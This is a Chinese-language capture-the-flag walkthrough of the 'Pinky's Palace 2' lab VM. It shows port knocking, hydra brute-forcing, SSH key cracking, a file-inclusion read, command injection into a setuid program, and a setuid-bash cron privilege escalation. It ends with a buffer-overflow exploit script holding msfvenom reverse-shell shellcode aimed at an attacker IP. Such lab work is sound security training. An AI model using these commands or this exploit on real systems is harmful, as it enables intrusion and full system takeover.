27Pinky.s-Palace-2

image-20241201182025178

信息收集

1
2
3
4
arp-scan -l          nmap --min-rate 100000 -p- 192.168.240.134     nmap --min-rate 100000 -p80,4655,7654,31337 -A 192.168.240.134

dirsearch -u 192.168.240.133   dirb  http://192.168.240.133/      nikto -host 192.168.240.134 -p 80
wpscan --url http://192.168.240.134 --enumerate u  //枚举用户
1
2
3
4
5
6
7
8
9
10
11
└─# nmap --min-rate 100000 -p- 192.168.240.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 18:20 CST
Nmap scan report for 192.168.240.134
Host is up (0.0059s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
4655/tcp  open  unknown
7654/tcp  open  unknown
31337/tcp open  Elite
MAC Address: 00:0C:29:2E:ED:51 (VMware)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Pinky's Blog – Just another WordPress site
|_http-generator: WordPress 4.9.4
4655/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
|   2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
|   256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_  256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp  open  http    nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: 403 Forbidden
31337/tcp open  Elite?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|   GetRequest:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     HTTP/1.0
|   HTTPOptions:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS / HTTP/1.0
|   Help:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     HELP
|   RTSPRequest:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS / RTSP/1.0
|   SIPOptions:
|     [+] Welcome to The Daemon [+]
|     This is soon to be our backdoor
|     into Pinky's Palace.
|     OPTIONS sip:nm SIP/2.0
|     Via: SIP/2.0/TCP nm;branch=foo
|     From: <sip:nm@nm>;tag=root
|     <sip:nm2@nm2>
|     Call-ID: 50000
|     CSeq: 42 OPTIONS
|     Max-Forwards: 70
|     Content-Length: 0
|     Contact: <sip:nm@nm>
|_    Accept: application/sdp
MAC Address: 00:0C:29:2E:ED:51 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─# nikto -host 192.168.240.134 -p 80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.240.134
+ Target Hostname:    192.168.240.134
+ Target Port:        80
+ Start Time:         2024-12-01 18:36:12 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://pinkydb/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /secret/: Directory indexing found.  # 这里有个字典,88907000666、pinkydb
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 8103 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2024-12-01 18:36:26 (GMT8) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
1
2
3
[+] pinky1337
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

渗透测试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
敲一下端口

import itertools
import subprocess
# 生成给定数字的所有不同组合
numbers = [8890, 7000, 666]
combinations = list(itertools.permutations(numbers))
# 使用knock工具对每个组合进行尝试
def run_knock():
    command = f"knock -v 192.168.240.134 {combo[0]} {combo[1]} {combo[2]}"
    print(command)
    subprocess.run(command,shell=True)#运行shell,即运行工具命令
if __name__ == '__main__':
    for combo in combinations:
        run_knock()
        
现在kali就能访问7654端口和31337端口了

image-20241201202539498image-20241201202611572

1
2
3
我们知道这是pinky的blog,账号应该是pinky,再结合上面给的一个字符串(pinkydb),以及80端口下所有字符串形成一个字典对这个登录框进行爆破一下
cewl http://pinkydb/ -w dict.txt
hydra -L dict.txt -P dict.txt pinkydb -s 7654 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid Username or Password"

image-20241201203120974

image-20241201203844293

1
2
3
4
5
6
7
8
9
Pinky:Passione 登录进去有一个key和这个note
- Stefano
- Intern Web developer
- Created RSA key for security for him to login

ssh登录Stefano
ssh stefano@192.168.240.134 -p 4655 -i id_rsa,发现登录不上,密钥有密码
用john工具对密钥的密码进行爆破,不过在爆破之前我们需要将密钥转换为john可以识别的内容,我们需要用到ssh2john工具 ssh2john id_rsa > id2_rsa
john --wordlist=/usr/share/wordlists/rockyou.txt id2_rsa   secretz101

image-20241201204829484

image-20241201204935923

image-20241201205012580

提权

1
2
3
4
在tools下发现qusb文件,Pinky made me this program so I can easily send messages to him.意思是说用这个程序给pinky发消息,cat一下发现没有权限
 python3 -m http.server开个端口把这个文件下载一下,,,不让我下载
 又做了好久的信息收集找到了文件包含这里,试试能不能包含qusb  http://pinkydb:7654/pageegap.php?1337=../../../../../../home/stefano/tools/qsub
wget http://pinkydb:7654/pageegap.php?1337=../../../../../../home/stefano/tools/qsub下载成功

image-20241201210422445

image-20241201211039219

之前就有遇到这种题–vulnhub-18pwnlab-init/

1
用;把前面的语句闭合然后拼接上要执行的./qsub "123;/bin/bash -p;"  开一个最高权限的shell,提示需要密码echo $TERM   xterm-256color

image-20241201211616282

1
pinky应该是开发者用的账号,还不是root,继续收集信息

image-20241201211740242

1
2
3
4
5
6
7
8
9
注意看这个txt文件是不是有点熟悉,看上面第二个图片,发送的消息就是保存在这个txt文件里的,或许可以二次提权,找不到利用的方法
cat .bash_history看一下历史命令发现 /usr/local/bin/backup.sh
newgrp一下,更新一下用户信息然后cat /usr/local/bin/backup.sh,其实就是备份网站的,
cat /etc/crontab 看一下计划任务,发现/usr/local/bin目录下所有的可执行文件都是root进行定时任务的。
尝试写一个反弹shell,就能弹到root权限账号
cp /bin/bash /tmp/shell #复制一个bash交互到/tmp文件夹下并命名为shell
chmod ugo+x /tmp/shell #赋予所有人运行权限
chmod u+s /tmp/shell #当文件被执行时,根据who参数指定的用户类型设置文件的setuid或者setgid权限
这是一种新型的弹shell
1
我们现在去/tmp等半小时,现在还没生成shell文件,先去打会守望先锋吧

image-20241201213032589image-20241201212816594

1
2
ok,./shell -p 拥有完全的pinky权限
查看一下root权限的进程ps -aux | grep root

image-20241201221843464

1
这个进程有点问题,查看一下strings /daemon/panel,这是个后门,下载一下

image-20241201222100289

1
2
3
4
放到ida中分析一下,按F5
v8是消息内容,放到变量buf
我们所输入的数据会存放到buf中然后传参给handlecmd函数
双击handlecmd

image-20241201222449226

image-20241201222516746

1
2
3
4
5
6
7
把buf传递给handlecmd函数
handlecmd里定义了字符串长度空间为112,调用了strcpy,但strcpy函数复制时没考虑长度,是全复制,就可能导致栈溢出。
基于上述分析,理论上112个就能填满空间,再加一字节长(64位的程序就是8个随机字符),后面跟的是返回地址。
从伪代码中可以看到send()发送的消息为信息收集时nc监听靶机31337端口时的回显。kali中运行该程序会开启端口31337,看来靶机上启动的31337端口运行就是这个程序。

我们使用msf生成一个shellcode并且排除其中的“x00”,因为会造成截断,
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.240.130 LPORT=1115 -f python -b '\x00'

image-20241202003441734

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import * #这是导入 pwntools 库,它是一个用于漏洞利用和二进制漏洞开发的 Python 库。
 
buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x40\xe4\x27\xed\x21"
buf += b"\xa5\x99\x6e\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\x2a\xcd\x7f\x74\x4b\xa7\xc6\x04\x41"
buf += b"\xba\x28\xe8\x69\x32\xd1\xd7\x42\xe4\x23\xb6\xe1"
buf += b"\x0d\x69\xec\x11\xac\xae\x0b\x4b\xb5\xc3\x04\x6a"
buf += b"\xbc\x28\xe8\x4b\xa6\xc7\x26\xbf\x2a\x4d\xcc\x79"
buf += b"\xaa\x9c\x1b\xb6\x8e\x1c\xb5\xb8\xed\x22\x41\x22"
buf += b"\x8d\x49\xc2\x52\xcd\x99\x3d\x08\x6d\xc0\xbf\x76"
buf += b"\xed\x10\x88\x4f\xe1\x27\xed\x21\xa5\x99\x6e"
 
ret = p64(0x400cfb) #创建一个长度为 8 字节的字符串,其中包含内存地址 0x400cfb 的字节表示。这是一个返回地址,用于在堆栈溢出后控制程序的执行流程。
#ret = "\xfb\x0c\x40\x00"
print (ret)
payload = buf + ret #创建一个新的字节串 payload,将 bufret 连接起来。这个 payload 包含了恶意输入,用于触发堆栈溢出,并将程序的执行流程指向 0x400cfb
r = remote("192.168.240.134", 31337) #创建一个IP 地址为 192.168.1.3,端口号为 31337 的远程连接对象。这意味着代码将尝试与运行在本地计算机上的服务器建立连接。
r.recv() #接收来自远程服务器的数据。这里用于清空接收缓冲区。
r.send(payload) #向远程服务器发送 payload 数据,触发堆栈溢出漏洞。
print("ok")

image-20241202003420793

1
运行一下就能拿到root

image-20241202003519154

1
真难